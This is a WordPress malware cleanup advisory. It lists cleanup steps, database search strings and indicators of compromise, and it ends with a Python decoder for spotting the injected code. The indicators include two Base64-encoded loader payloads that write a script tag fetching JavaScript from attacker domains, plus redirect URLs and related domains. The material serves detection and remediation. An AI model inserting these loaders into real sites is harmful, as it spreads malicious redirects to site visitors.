Last updated: September 24 2020
According to the publicwww index, approx. 1223 sites are currently affected by this hack.
Site files cleanup notes
Almost all web folders will get infected, so it is wise to start completely fresh.
1. Perform an overall backup – site files and database;
2. Move all web files outside the root folder, to prevent further data loss;
3. Rebuild everything, making sure plugins and themes are all malware free;
4. Restore wp-config.php and the wp-content/uploads folder, but make sure these are malware free (manual check); and
5. Make sure core files, plugins and theme are up to date (delete everything unused or abandoned);
1. Use phpMyAdmin and look for “base64”, “cda-google.com” and “fromCharCode”;
2. Use a search-and-replace tool to get rid of malicious entries:
3. Make sure no extra admin users were added by hackers;
Base64-encoded, unescaped and final script here: cda-google.com (.txt file).
Base64 code: ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU2MyU2NCU2MSUyZCU2NyU2ZiU2ZiU2NyU2YyU2NSUyZSU2MyU2ZiU2ZCUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=
Redirect to: hxxps://mol16.biz/?p=hbqwemrsgm5gi3bpgm2tamq
Base64 code: ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=
Redirect to: hxxps://checkandgo.info/?p=gvsdezbtgm5gi3bpgi4da
Other domains hosted on 18.104.22.168: mol7.biz, mol9.biz, net06.biz, news98.biz, report3.biz, listlist.club, 27news.biz, 1mono.biz, 2solo.biz, 3mono.biz, 3sercher.biz, w5sercher.biz, w4sercher.biz.
Domain details: According to domaintools, the domain was registered on 6/30/2020 and points to Cloudflare.
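Each Base64 string above decodes to a `document.write(unescape('...'))` call whose argument is a percent-encoded script tag. The Python below is an added example, not code from the original post: it peels both layers from a database field or file body and reports the script URL it finds. The `eval(atob(...))` wrapper in the sample, the 40-character threshold and the `loader.example` domain are constructed assumptions.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Runs of base64 alphabet long enough to hold an injected loader (threshold is an assumption).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
UNESCAPE_ARG = re.compile(r"unescape\(\s*['\"]([^'\"]+)['\"]")
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)


def decode_layers(blob):
    """Return script URLs hidden in one base64 blob, or [] if it is not this pattern."""
    try:
        js = base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return []  # not base64-encoded text: ordinary content, ignore
    urls = []
    for escaped in UNESCAPE_ARG.findall(js):
        html = unquote(escaped)  # same result as JS unescape() for ASCII %XX sequences
        urls.extend(SCRIPT_SRC.findall(html))
    return urls


def scan_text(text):
    """Scan a database field or file body; return [(blob_prefix, url), ...]."""
    hits = []
    for match in B64_RUN.finditer(text):
        for url in decode_layers(match.group(0)):
            hits.append((match.group(0)[:16], url))
    return hits


def build_sample(url):
    """Constructed input: layer a placeholder URL the same way as the blobs on this page."""
    tag = '<script src="%s"></script> ' % url
    escaped = "".join("%%%02x" % ord(c) for c in tag)
    js = "document.write(unescape('%s'));" % escaped
    return base64.b64encode(js.encode()).decode()


if __name__ == "__main__":
    # Constructed post_content value; the wrapper and domain are assumptions, not IoCs.
    blob = build_sample("https://loader.example/abc123")
    field = "<p>Hello</p><script>eval(atob('%s'));</script>" % blob
    for prefix, url in scan_text(field):
        print(prefix + "...", "->", url)
```

Run `scan_text` over exported rows or file contents offline; it only decodes and never executes the recovered script.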